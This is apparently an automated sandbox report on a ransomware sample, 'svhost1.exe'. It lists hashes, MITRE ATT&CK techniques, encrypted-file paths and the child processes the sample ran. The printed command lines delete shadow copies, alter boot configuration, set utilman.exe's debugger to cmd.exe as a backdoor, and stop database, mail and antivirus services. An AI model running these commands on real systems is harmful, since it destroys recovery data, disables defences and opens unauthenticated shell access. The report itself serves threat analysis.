247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536

General

Target

svhost1.exe
Size

2.8MB
MD5

0527539f8c9af38ea8c36e9d2be595cd
SHA1

a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
SHA256

247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
SHA512

00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4

Score

9^/10

ransomware evasion persistence spyware

Malware Config

Signatures

Runs net.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1616 vssadmin.exe

pid	process
1616	vssadmin.exe

Suspicious use of WriteProcessMemory 141 IoCs

Processes:

svhost1.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1100 wrote to memory of 596	1100	svhost1.exe	powershell.exe
PID 1100 wrote to memory of 596	1100	svhost1.exe	powershell.exe
PID 1100 wrote to memory of 596	1100	svhost1.exe	powershell.exe
PID 596 wrote to memory of 660	596	powershell.exe	net.exe
PID 596 wrote to memory of 660	596	powershell.exe	net.exe
PID 596 wrote to memory of 660	596	powershell.exe	net.exe
PID 1100 wrote to memory of 984	1100	svhost1.exe	powershell.exe
PID 1100 wrote to memory of 984	1100	svhost1.exe	powershell.exe
PID 1100 wrote to memory of 984	1100	svhost1.exe	powershell.exe
PID 984 wrote to memory of 1068	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1068	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1068	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1616	984	powershell.exe	vssadmin.exe
PID 984 wrote to memory of 1616	984	powershell.exe	vssadmin.exe
PID 984 wrote to memory of 1616	984	powershell.exe	vssadmin.exe
PID 984 wrote to memory of 1608	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1608	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1608	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1620	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1620	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1620	984	powershell.exe	reg.exe
PID 984 wrote to memory of 1704	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1704	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1704	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1892	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1892	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1892	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1840	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1840	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1840	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1916	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1916	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1916	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1264	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1264	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1264	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 540	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 540	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 540	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2036	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2036	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2036	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2012	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2012	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 2012	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1452	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1452	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1452	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1480	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1480	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1480	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1308	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1308	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1308	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 276	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 276	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 276	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 432	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 432	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 432	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 216	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 216	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 216	984	powershell.exe	WMIC.exe
PID 984 wrote to memory of 1500	984	powershell.exe	WMIC.exe

Suspicious use of AdjustPrivilegeToken 1565 IoCs

Processes:

powershell.exepowershell.exeWMIC.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	596	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: SeBackupPrivilege	1784	vssvc.exe
Token: SeRestorePrivilege	1784	vssvc.exe
Token: SeAuditPrivilege	1784	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe
Token: SeSystemProfilePrivilege	1704	WMIC.exe
Token: SeSystemtimePrivilege	1704	WMIC.exe
Token: SeProfSingleProcessPrivilege	1704	WMIC.exe
Token: SeIncBasePriorityPrivilege	1704	WMIC.exe
Token: SeCreatePagefilePrivilege	1704	WMIC.exe
Token: SeBackupPrivilege	1704	WMIC.exe
Token: SeRestorePrivilege	1704	WMIC.exe
Token: SeShutdownPrivilege	1704	WMIC.exe
Token: SeDebugPrivilege	1704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1704	WMIC.exe
Token: SeRemoteShutdownPrivilege	1704	WMIC.exe
Token: SeUndockPrivilege	1704	WMIC.exe
Token: SeManageVolumePrivilege	1704	WMIC.exe
Token: 33	1704	WMIC.exe
Token: 34	1704	WMIC.exe

Drops file in Program Files directory 100 IoCs

Processes:

svhost1.exe

description	ioc	process
File opened for modification	C:\Program Files\desktop.ini	svhost1.exe
File created	C:\Program Files\UnprotectCompare.ppsx_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\F12Resources.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\iedvtool.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\msdbg2.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\D3DCompiler_47.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\IEShims.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\JSProfilerCore.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\InstallBackup.cab	svhost1.exe
File created	C:\Program Files\UnpublishRestore.xps_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\iedvtool.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\JSProfilerCore.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\perfcore.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7z.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\BlockImport.xhtml	svhost1.exe
File created	C:\Program Files\NewRevoke.bin_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\pdmproxy100.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\Timeline.cpu.xml_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\Timeline.cpu.xml	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\Timeline_is.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\msdbg2.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\ConvertFromCheckpoint.js	svhost1.exe
File opened for modification	C:\Program Files\MergeSet.xlsx	svhost1.exe
File created	C:\Program Files\Internet Explorer\ieinstal.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\IEShims.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\jsprofilerui.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\jsprofilerui.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\F12Resources.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\networkinspection.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\Timeline.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7-zip.chm_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7-zip32.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\OutRequest.ini_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\RequestImport.cmd_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\ResetAssert.vssx	svhost1.exe
File created	C:\Program Files\WatchOut.clr_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\WatchOut.clr	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\pdm.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\sqmapi.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\OutRequest.ini	svhost1.exe
File opened for modification	C:\Program Files\UseInvoke.xltm	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\DiagnosticsHub_is.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\iediagcmd.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	svhost1.exe
File created	C:\Program Files\Internet Explorer\MemoryAnalyzer.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\ConvertFromCheckpoint.js_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\UseInvoke.xltm_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ieproxy.dll	svhost1.exe
File opened for modification	C:\Program Files\UnpublishRestore.xps	svhost1.exe
File created	C:\Program Files\Internet Explorer\jsdbgui.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\perf_nt.dll	svhost1.exe
File created	C:\Program Files\Internet Explorer\Timeline_is.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\BlockImport.xhtml_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\desktop.ini_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\RequestImport.cmd	svhost1.exe
File created	C:\Program Files\WaitConnect.xps_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\F12.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ie9props.propdesc	svhost1.exe

Drops file in Windows directory 56 IoCs

Processes:

svhost1.exe

description	ioc	process
File created	C:\Windows\mib.bin_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\system.ini	svhost1.exe
File opened for modification	C:\Windows\winhlp32.exe	svhost1.exe
File created	C:\Windows\DtcInstall.log_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\notepad.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\bfsvc.exe	svhost1.exe
File created	C:\Windows\write.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\msdfmap.ini	svhost1.exe
File created	C:\Windows\regedit.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\win.ini	svhost1.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svhost1.exe
File created	C:\Windows\bfsvc.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\HelpPane.exe	svhost1.exe
File created	C:\Windows\WMSysPr9.prx_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\twain_32.dll	svhost1.exe
File created	C:\Windows\splwow64.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\twain.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\twunk_32.exe	svhost1.exe
File opened for modification	C:\Windows\Starter.xml	svhost1.exe
File created	C:\Windows\explorer.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\Professional.xml	svhost1.exe
File opened for modification	C:\Windows\write.exe	svhost1.exe
File opened for modification	C:\Windows\DtcInstall.log	svhost1.exe
File opened for modification	C:\Windows\hh.exe	svhost1.exe
File opened for modification	C:\Windows\TSSysprep.log	svhost1.exe
File opened for modification	C:\Windows\WMSysPr9.prx	svhost1.exe
File created	C:\Windows\system.ini_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\twain.dll	svhost1.exe
File created	C:\Windows\twain_32.dll_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\twunk_16.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\winhlp32.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\bootstat.dat_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\Professional.xml_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\splwow64.exe	svhost1.exe
File created	C:\Windows\WindowsShell.Manifest_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	svhost1.exe
File opened for modification	C:\Windows\bootstat.dat	svhost1.exe
File created	C:\Windows\fveupdate.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\setupact.log	svhost1.exe
File created	C:\Windows\win.ini_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\PFRO.log	svhost1.exe
File opened for modification	C:\Windows\regedit.exe	svhost1.exe
File created	C:\Windows\setupact.log_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\hh.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\PFRO.log_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\TSSysprep.log_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\twunk_16.exe	svhost1.exe
File created	C:\Windows\twunk_32.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\WindowsUpdate.log_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\explorer.exe	svhost1.exe
File created	C:\Windows\msdfmap.ini_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\Starter.xml_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\mib.bin	svhost1.exe
File opened for modification	C:\Windows\notepad.exe	svhost1.exe
File opened for modification	C:\Windows\fveupdate.exe	svhost1.exe
File created	C:\Windows\HelpPane.exe_ID_2876361323_[decryption@qbmail.biz].trix	svhost1.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

596 powershell.exe
984 powershell.exe
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2024 bcdedit.exe
1968 bcdedit.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
596	powershell.exe
984	powershell.exe

pid	process
2024	bcdedit.exe
1968	bcdedit.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

svhost1.exe

description	ioc	process
File opened for modification	C:\Program Files\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini	svhost1.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe"	reg.exe

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

660 net.exe

pid	process
660	net.exe

C:\Users\Admin\AppData\Local\Temp\svhost1.exe
"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Drops file in Windows directory
- Drops desktop.ini file(s)
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -Command -
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:596

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" view
3⤵
- Discovers systems in the same network
PID:660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -Command -
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:984

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\system32\vssadmin.exe
"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1616

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
3⤵
- Sets file execution options in registry
PID:1608

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
3⤵
- Sets file execution options in registry
PID:1620

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
3⤵
PID:1892

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
3⤵
PID:1840

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
3⤵
PID:1916

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
3⤵
PID:1264

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
3⤵
PID:540

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
3⤵
PID:2036

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
3⤵
PID:2012

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
3⤵
PID:1452

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
3⤵
PID:1480

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
3⤵
PID:1308

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
3⤵
PID:276

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
3⤵
PID:432

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
3⤵
PID:216

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
3⤵
PID:1500

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
3⤵
PID:1592

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
3⤵
PID:1192

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
3⤵
PID:1572

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
3⤵
PID:1880

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
3⤵
PID:1840

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
3⤵
PID:1916

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
3⤵
PID:1264

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
3⤵
PID:540

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
3⤵
PID:2036

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
3⤵
PID:2012

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
3⤵
PID:1456

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
3⤵
PID:596

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
3⤵
PID:528

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
3⤵
PID:204

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
3⤵
PID:1488

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
3⤵
PID:1580

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
3⤵
PID:1608

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
3⤵
PID:1560

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
3⤵
PID:1848

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
3⤵
PID:1888

